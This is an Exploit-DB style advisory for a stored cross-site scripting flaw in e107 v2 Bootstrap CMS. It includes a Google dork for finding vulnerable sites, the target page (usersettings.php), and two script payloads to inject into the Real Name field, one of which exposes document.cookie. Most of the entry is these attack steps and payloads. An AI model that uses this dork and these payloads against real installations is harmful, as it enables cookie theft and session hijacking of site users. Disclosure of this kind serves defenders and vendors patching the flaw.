e107 2 Bootstrap CMS - Cross-Site Scripting

EDB-ID:

35679


Platform:

PHP

Published:

2015-01-03

 _____       _____  ______
|  _  |     |  _  ||___  /
| |/' |_  __| |_| |   / / 
|  /| \ \/ /\____ |  / /  
\ |_/ />  < .___/ /./ /   
 \___//_/\_\\____/ \_/    
                        by bl4ck s3c


# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107 
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
 
# Vulnerability Description:

CMS user details section is vulnerable to XSS. You can run XSS payloads.

XSS Vulnerability #1:

Go Update user settings page

"http://{target-url}/usersettings.php"

Set Real Name value;

"><script>alert(String.fromCharCode(88, 83, 83))</script>

or

"><script>alert(document.cookie)</script>


========
Credits:
========
 
Vulnerability found and advisory written by Ahmet Agar.
 
===========
References:
===========
 
http://www.0x97.info
htts://twitter.com/_HacKingZ_